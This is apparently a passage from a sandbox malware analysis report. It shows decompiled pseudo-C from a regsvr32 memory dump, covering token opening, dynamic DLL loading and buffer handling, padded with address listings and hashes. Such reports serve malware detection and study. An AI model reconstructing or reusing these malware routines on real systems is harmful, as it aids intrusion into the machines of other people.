						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E05375FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E05377120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E05375E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                        0x05374106
                                                                                                                                                                        0x0537410b
                                                                                                                                                                        0x0537410f
                                                                                                                                                                        0x05374112
                                                                                                                                                                        0x05374112
                                                                                                                                                                        0x05374115
                                                                                                                                                                        0x0537411a
                                                                                                                                                                        0x0537411f
                                                                                                                                                                        0x05374122
                                                                                                                                                                        0x05374127
                                                                                                                                                                        0x0537412a
                                                                                                                                                                        0x05374130
                                                                                                                                                                        0x05374130
                                                                                                                                                                        0x0537413b
                                                                                                                                                                        0x0537413e
                                                                                                                                                                        0x05374145
                                                                                                                                                                        0x0537414a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374150
                                                                                                                                                                        0x05374155
                                                                                                                                                                        0x05374155
                                                                                                                                                                        0x0537415a
                                                                                                                                                                        0x05374160
                                                                                                                                                                        0x0537416a
                                                                                                                                                                        0x0537416f
                                                                                                                                                                        0x05374175
                                                                                                                                                                        0x05374194
                                                                                                                                                                        0x05374197
                                                                                                                                                                        0x053741a2
                                                                                                                                                                        0x053741a2
                                                                                                                                                                        0x053741a2
                                                                                                                                                                        0x05374199
                                                                                                                                                                        0x05374199
                                                                                                                                                                        0x0537419b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537419d
                                                                                                                                                                        0x0537419d
                                                                                                                                                                        0x0537419d
                                                                                                                                                                        0x0537419b
                                                                                                                                                                        0x053741aa
                                                                                                                                                                        0x053741af
                                                                                                                                                                        0x053741b4
                                                                                                                                                                        0x053741ba
                                                                                                                                                                        0x053741be
                                                                                                                                                                        0x053741c1
                                                                                                                                                                        0x053741c4
                                                                                                                                                                        0x053741ca
                                                                                                                                                                        0x053741cf
                                                                                                                                                                        0x053741d2
                                                                                                                                                                        0x053741d8
                                                                                                                                                                        0x053741dd
                                                                                                                                                                        0x053741e3
                                                                                                                                                                        0x053741e9
                                                                                                                                                                        0x053741ee
                                                                                                                                                                        0x053741f1
                                                                                                                                                                        0x053741f6
                                                                                                                                                                        0x053741fa
                                                                                                                                                                        0x053741fe
                                                                                                                                                                        0x05374201
                                                                                                                                                                        0x05374204
                                                                                                                                                                        0x0537420d
                                                                                                                                                                        0x05374214
                                                                                                                                                                        0x05374217
                                                                                                                                                                        0x0537421a
                                                                                                                                                                        0x0537421f
                                                                                                                                                                        0x05374224
                                                                                                                                                                        0x05374227
                                                                                                                                                                        0x0537422a
                                                                                                                                                                        0x0537422a
                                                                                                                                                                        0x0537422e
                                                                                                                                                                        0x05374237
                                                                                                                                                                        0x0537423e
                                                                                                                                                                        0x05374241
                                                                                                                                                                        0x05374246
                                                                                                                                                                        0x0537424b
                                                                                                                                                                        0x0537424b
                                                                                                                                                                        0x0537424e
                                                                                                                                                                        0x05374253
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374177
                                                                                                                                                                        0x05374179
                                                                                                                                                                        0x05374186
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374186
                                                                                                                                                                        0x05374179
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374175
                                                                                                                                                                        0x05374259
                                                                                                                                                                        0x0537425e
                                                                                                                                                                        0x05374261
                                                                                                                                                                        0x05374264
                                                                                                                                                                        0x0537430f
                                                                                                                                                                        0x0537430f
                                                                                                                                                                        0x0537426a
                                                                                                                                                                        0x0537426a
                                                                                                                                                                        0x0537426a
                                                                                                                                                                        0x0537426f
                                                                                                                                                                        0x05374299
                                                                                                                                                                        0x0537429c
                                                                                                                                                                        0x0537429c
                                                                                                                                                                        0x053742a1
                                                                                                                                                                        0x053742a3
                                                                                                                                                                        0x053742a5
                                                                                                                                                                        0x053742a8
                                                                                                                                                                        0x053742ab
                                                                                                                                                                        0x053742b3
                                                                                                                                                                        0x053742b8
                                                                                                                                                                        0x053742b8
                                                                                                                                                                        0x053742be
                                                                                                                                                                        0x053742c1
                                                                                                                                                                        0x053742c4
                                                                                                                                                                        0x053742c7
                                                                                                                                                                        0x053742c9
                                                                                                                                                                        0x053742c9
                                                                                                                                                                        0x053742ca
                                                                                                                                                                        0x053742ca
                                                                                                                                                                        0x053742c7
                                                                                                                                                                        0x053742d8
                                                                                                                                                                        0x053742db
                                                                                                                                                                        0x053742df
                                                                                                                                                                        0x053742e4
                                                                                                                                                                        0x053742e7
                                                                                                                                                                        0x053742ea
                                                                                                                                                                        0x053742ea
                                                                                                                                                                        0x053742ea
                                                                                                                                                                        0x053742ed
                                                                                                                                                                        0x053742ed
                                                                                                                                                                        0x053742f0
                                                                                                                                                                        0x053742f0
                                                                                                                                                                        0x05374271
                                                                                                                                                                        0x05374271
                                                                                                                                                                        0x05374281
                                                                                                                                                                        0x05374284
                                                                                                                                                                        0x05374289
                                                                                                                                                                        0x05374289
                                                                                                                                                                        0x0537428c
                                                                                                                                                                        0x0537428f
                                                                                                                                                                        0x05374292
                                                                                                                                                                        0x05374294
                                                                                                                                                                        0x05374294
                                                                                                                                                                        0x053742f3
                                                                                                                                                                        0x053742f5
                                                                                                                                                                        0x053742f8
                                                                                                                                                                        0x053742f8
                                                                                                                                                                        0x053742fe
                                                                                                                                                                        0x05374302
                                                                                                                                                                        0x05374305
                                                                                                                                                                        0x05374307
                                                                                                                                                                        0x05374307
                                                                                                                                                                        0x05374318
                                                                                                                                                                        0x0537431a
                                                                                                                                                                        0x0537431a
                                                                                                                                                                        0x05374322
                                                                                                                                                                        0x05374330
                                                                                                                                                                        0x05374333
                                                                                                                                                                        0x05374335
                                                                                                                                                                        0x05374355
                                                                                                                                                                        0x05374355
                                                                                                                                                                        0x05374358
                                                                                                                                                                        0x0537435e
                                                                                                                                                                        0x0537435f
                                                                                                                                                                        0x05374362
                                                                                                                                                                        0x05374364
                                                                                                                                                                        0x05374367
                                                                                                                                                                        0x0537436a
                                                                                                                                                                        0x0537436d
                                                                                                                                                                        0x05374371
                                                                                                                                                                        0x05374374
                                                                                                                                                                        0x05374377
                                                                                                                                                                        0x0537437a
                                                                                                                                                                        0x0537437c
                                                                                                                                                                        0x0537437c
                                                                                                                                                                        0x0537437f
                                                                                                                                                                        0x05374381
                                                                                                                                                                        0x05374381
                                                                                                                                                                        0x05374384
                                                                                                                                                                        0x05374386
                                                                                                                                                                        0x05374389
                                                                                                                                                                        0x05374391
                                                                                                                                                                        0x05374394
                                                                                                                                                                        0x05374399
                                                                                                                                                                        0x05374399
                                                                                                                                                                        0x0537439f
                                                                                                                                                                        0x053743a2
                                                                                                                                                                        0x053743a5
                                                                                                                                                                        0x053743a7
                                                                                                                                                                        0x053743a7
                                                                                                                                                                        0x053743a8
                                                                                                                                                                        0x053743a8
                                                                                                                                                                        0x053743b3
                                                                                                                                                                        0x053743b3
                                                                                                                                                                        0x053743b3
                                                                                                                                                                        0x053743b6
                                                                                                                                                                        0x053743b9
                                                                                                                                                                        0x053743b9
                                                                                                                                                                        0x053743bc
                                                                                                                                                                        0x053743bc
                                                                                                                                                                        0x0537437f
                                                                                                                                                                        0x053743bf
                                                                                                                                                                        0x053743c2
                                                                                                                                                                        0x053743c5
                                                                                                                                                                        0x053743c7
                                                                                                                                                                        0x053743ca
                                                                                                                                                                        0x053743cc
                                                                                                                                                                        0x053743cf
                                                                                                                                                                        0x053743d2
                                                                                                                                                                        0x053743d4
                                                                                                                                                                        0x053743d7
                                                                                                                                                                        0x053743df
                                                                                                                                                                        0x053743e7
                                                                                                                                                                        0x053743ea
                                                                                                                                                                        0x053743ea
                                                                                                                                                                        0x053743ea
                                                                                                                                                                        0x053743ed
                                                                                                                                                                        0x053743ed
                                                                                                                                                                        0x053743ed
                                                                                                                                                                        0x053743f0
                                                                                                                                                                        0x053743f6
                                                                                                                                                                        0x053743f8
                                                                                                                                                                        0x053743f8
                                                                                                                                                                        0x053743fe
                                                                                                                                                                        0x05374404
                                                                                                                                                                        0x0537440d
                                                                                                                                                                        0x05374414
                                                                                                                                                                        0x05374416
                                                                                                                                                                        0x05374419
                                                                                                                                                                        0x05374419
                                                                                                                                                                        0x0537441c
                                                                                                                                                                        0x0537441c
                                                                                                                                                                        0x0537441f
                                                                                                                                                                        0x05374421
                                                                                                                                                                        0x05374424
                                                                                                                                                                        0x05374426
                                                                                                                                                                        0x05374441
                                                                                                                                                                        0x05374441
                                                                                                                                                                        0x05374445
                                                                                                                                                                        0x05374448
                                                                                                                                                                        0x0537444b
                                                                                                                                                                        0x0537444e
                                                                                                                                                                        0x05374464
                                                                                                                                                                        0x05374464
                                                                                                                                                                        0x05374464
                                                                                                                                                                        0x05374450
                                                                                                                                                                        0x05374450
                                                                                                                                                                        0x05374452
                                                                                                                                                                        0x05374456
                                                                                                                                                                        0x05374459
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537445b
                                                                                                                                                                        0x0537445b
                                                                                                                                                                        0x0537445d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537445f
                                                                                                                                                                        0x0537445f
                                                                                                                                                                        0x0537445f
                                                                                                                                                                        0x0537445d
                                                                                                                                                                        0x05374459
                                                                                                                                                                        0x05374468
                                                                                                                                                                        0x0537446b
                                                                                                                                                                        0x05374470
                                                                                                                                                                        0x0537447a
                                                                                                                                                                        0x0537447a
                                                                                                                                                                        0x0537447a
                                                                                                                                                                        0x0537447d
                                                                                                                                                                        0x05374428
                                                                                                                                                                        0x05374428
                                                                                                                                                                        0x0537442a
                                                                                                                                                                        0x05374431
                                                                                                                                                                        0x05374431
                                                                                                                                                                        0x05374433
                                                                                                                                                                        0x05374435
                                                                                                                                                                        0x05374437
                                                                                                                                                                        0x0537443b
                                                                                                                                                                        0x0537443d
                                                                                                                                                                        0x0537443f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537443f
                                                                                                                                                                        0x0537443b
                                                                                                                                                                        0x0537442c
                                                                                                                                                                        0x0537442c
                                                                                                                                                                        0x0537442f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537442f
                                                                                                                                                                        0x0537442a
                                                                                                                                                                        0x05374487
                                                                                                                                                                        0x05374489
                                                                                                                                                                        0x05374489
                                                                                                                                                                        0x05374494
                                                                                                                                                                        0x05374337
                                                                                                                                                                        0x05374337
                                                                                                                                                                        0x0537433a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537433c
                                                                                                                                                                        0x0537433c
                                                                                                                                                                        0x0537433e
                                                                                                                                                                        0x05374342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05374344
                                                                                                                                                                        0x05374344
                                                                                                                                                                        0x05374344
                                                                                                                                                                        0x05374347
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0537434b
                                                                                                                                                                        0x05374354
                                                                                                                                                                        0x05374354
                                                                                                                                                                        0x05374347
                                                                                                                                                                        0x05374342
                                                                                                                                                                        0x0537433a
                                                                                                                                                                        0x05374326
                                                                                                                                                                        0x0537432f
                                                                                                                                                                        0x0537432f

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                                                        • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction ID: 7dc343ceaa4820eec73f6905f753709d3c383a36b51712e1561a3d9976eebd24
                                                                                                                                                                        • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                        • Instruction Fuzzy Hash: 66D11271A007089FDB34CF69D8C4A6AB7E6FF88304B24896DE88AC7701D775F9548B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536C79E Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0536C79E(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x537f818; // 0x546f8b0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x12c))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}






                                                                                                                                                                        0x0536c7bd
                                                                                                                                                                        0x0536c7ef
                                                                                                                                                                        0x0536c7ef
                                                                                                                                                                        0x0536c7bf
                                                                                                                                                                        0x0536c7ca
                                                                                                                                                                        0x0536c7eb
                                                                                                                                                                        0x0536c7eb
                                                                                                                                                                        0x0536c7cc
                                                                                                                                                                        0x0536c7d6
                                                                                                                                                                        0x0536c7e9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536c7e9
                                                                                                                                                                        0x0536c7ca
                                                                                                                                                                        0x0536c7f4

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0536C7B1
                                                                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7B8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,0536C8E3,00000000,05360000), ref: 0536C7BF
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,0536C8E3,00000000,05360000), ref: 0536C7E4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenThreadToken$CurrentErrorLastProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1515895013-0
                                                                                                                                                                        • Opcode ID: a4c8817edeea00bd7feffa2853146659acbe7b8c38ee752181bd4d508ac69b6e
                                                                                                                                                                        • Instruction ID: a70bf0bbd99bd55c4209a71c5fec36e7b21298d3f0b92b597d05d6d100302525
                                                                                                                                                                        • Opcode Fuzzy Hash: a4c8817edeea00bd7feffa2853146659acbe7b8c38ee752181bd4d508ac69b6e
                                                                                                                                                                        • Instruction Fuzzy Hash: C3F0D07291021DEFDB119BA5D84AFAA7BFCFB0C754F044458F652D7440DB60E9408791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0536D218 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E0536D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x537f81c; // 0x546fbe8
				_t1 = _t50 + 0x1898; // 0x0
				_t14 =  *_t1;
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E05369DF2(_t50, 0x392);
					_t66 =  *0x537f81c; // 0x546fbe8
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E05369E51( &_v140, 0x40, L"%08x", E0536E2C5(_t66 + 0xb0, E0536A43D(_t66 + 0xb0), 0));
					_t20 =  *0x537f81c; // 0x546fbe8
					_t7 = _t20 + 0xa8; // 0x1
					asm("sbb eax, eax");
					_t25 = E05369DF2(_t67, ( ~( *_t7) & 0x00000a0b) + 0xf8);
					_t26 =  *0x537f81c; // 0x546fbe8
					_t68 = E05369A5A(_t26 + 0x1020);
					_v12 = _t68;
					E05368BAF( &_v8);
					_t32 =  *0x537f81c; // 0x546fbe8
					_t34 = E05369A5A(_t32 + 0x122a);
					 *0x537f91c = _t34;
					_t35 =  *0x537f818; // 0x546f8b0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x537c9a0,  &_v140, ".", L"dll", 0, 0x537c9a0, _t25, 0x537c9a0, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x537f91c);
					 *0x537f914 = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E0536F011(0x537cb8c, _t60);
					}
					 *0x537f918 = _t38;
					E05368BF4( &_v12, 0xfffffffe);
					E05368D6D( &_v140, 0, 0x80);
					if( *0x537f918 != 0) {
						goto L10;
					} else {
						E05368BF4(0x537f91c, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x537f918 == 0) {
						_t46 =  *0x537f850; // 0x546f9f0
						 *0x537f918 = _t46;
					}
					L10:
					return 1;
				}
			}

























                                                                                                                                                                        0x0536d218
                                                                                                                                                                        0x0536d218
                                                                                                                                                                        0x0536d218
                                                                                                                                                                        0x0536d21b
                                                                                                                                                                        0x0536d227
                                                                                                                                                                        0x0536d227
                                                                                                                                                                        0x0536d232
                                                                                                                                                                        0x0536d24e
                                                                                                                                                                        0x0536d253
                                                                                                                                                                        0x0536d25c
                                                                                                                                                                        0x0536d25e
                                                                                                                                                                        0x0536d266
                                                                                                                                                                        0x0536d287
                                                                                                                                                                        0x0536d28c
                                                                                                                                                                        0x0536d291
                                                                                                                                                                        0x0536d299
                                                                                                                                                                        0x0536d2a6
                                                                                                                                                                        0x0536d2b4
                                                                                                                                                                        0x0536d2c5
                                                                                                                                                                        0x0536d2cb
                                                                                                                                                                        0x0536d2ce
                                                                                                                                                                        0x0536d2e5
                                                                                                                                                                        0x0536d2f1
                                                                                                                                                                        0x0536d2f9
                                                                                                                                                                        0x0536d300
                                                                                                                                                                        0x0536d306
                                                                                                                                                                        0x0536d312
                                                                                                                                                                        0x0536d318
                                                                                                                                                                        0x0536d31f
                                                                                                                                                                        0x0536d332
                                                                                                                                                                        0x0536d321
                                                                                                                                                                        0x0536d321
                                                                                                                                                                        0x0536d324
                                                                                                                                                                        0x0536d32a
                                                                                                                                                                        0x0536d32f
                                                                                                                                                                        0x0536d334
                                                                                                                                                                        0x0536d33f
                                                                                                                                                                        0x0536d351
                                                                                                                                                                        0x0536d363
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d365
                                                                                                                                                                        0x0536d36c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0536d372
                                                                                                                                                                        0x0536d373
                                                                                                                                                                        0x0536d373
                                                                                                                                                                        0x0536d37a
                                                                                                                                                                        0x0536d37c
                                                                                                                                                                        0x0536d381
                                                                                                                                                                        0x0536d381
                                                                                                                                                                        0x0536d386
                                                                                                                                                                        0x0536d38a
                                                                                                                                                                        0x0536d38a

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: %08x$dll
                                                                                                                                                                        • API String ID: 1029625771-2963171978
                                                                                                                                                                        • Opcode ID: 831125fc99a2aab5942f86d5726ff00588434c4e69d0161829a36a1480cc1003
                                                                                                                                                                        • Instruction ID: 07cc8c0c7cd752c66e8a5f162d673099007891acef7b50a5c73fab362add4c16
                                                                                                                                                                        • Opcode Fuzzy Hash: 831125fc99a2aab5942f86d5726ff00588434c4e69d0161829a36a1480cc1003
                                                                                                                                                                        • Instruction Fuzzy Hash: 383173B2B50108BFD720AB68EC4AFAA77EDF746314F14C139F004D7184EE74998587A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05373674 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E05373674(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E0537358D(_a4);
				 *_t32 = "msxml3.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E0536A43D();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x537cf58;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x537cf58;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L05378935();
				return _t29 - _t22;
			}

















                                                                                                                                                                        0x05373674
                                                                                                                                                                        0x0537367f
                                                                                                                                                                        0x05373686
                                                                                                                                                                        0x0537368d
                                                                                                                                                                        0x05373693
                                                                                                                                                                        0x0537369b
                                                                                                                                                                        0x0537369c
                                                                                                                                                                        0x0537369e
                                                                                                                                                                        0x053736a3
                                                                                                                                                                        0x053736ab
                                                                                                                                                                        0x053736ab
                                                                                                                                                                        0x053736ae
                                                                                                                                                                        0x053736b2
                                                                                                                                                                        0x053736a5
                                                                                                                                                                        0x053736a5
                                                                                                                                                                        0x053736a9
                                                                                                                                                                        0x053736ab
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x053736ab
                                                                                                                                                                        0x053736a9
                                                                                                                                                                        0x053736bb
                                                                                                                                                                        0x053736c4
                                                                                                                                                                        0x053736c9
                                                                                                                                                                        0x053736cc
                                                                                                                                                                        0x053736cf
                                                                                                                                                                        0x053736d2
                                                                                                                                                                        0x053736d4
                                                                                                                                                                        0x053736d4
                                                                                                                                                                        0x053736da
                                                                                                                                                                        0x053736dd
                                                                                                                                                                        0x053736e0
                                                                                                                                                                        0x053736e3
                                                                                                                                                                        0x053736e8
                                                                                                                                                                        0x053736ea
                                                                                                                                                                        0x053736ea
                                                                                                                                                                        0x053736f0
                                                                                                                                                                        0x053736fc
                                                                                                                                                                        0x053736fe
                                                                                                                                                                        0x0537370a

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 053736BB
                                                                                                                                                                        • _ftol2_sse.MSVCRT ref: 053736FE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001B.00000002.496124350.0000000005360000.00000040.00001000.00020000.00000000.sdmp, Offset: 05360000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_27_2_5360000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _ftol2_sselstrlen
                                                                                                                                                                        • String ID: msxml3.dll
                                                                                                                                                                        • API String ID: 1292649733-2158035192
                                                                                                                                                                        • Opcode ID: 70242a3cc234ed20180fc4216fdb852dcc73d96dbc909186fa67038a29e3e3ea
                                                                                                                                                                        • Instruction ID: a0badae73ccbc4f56beea4f3e351505be38c7f8264bf4298eef768ce07a84341
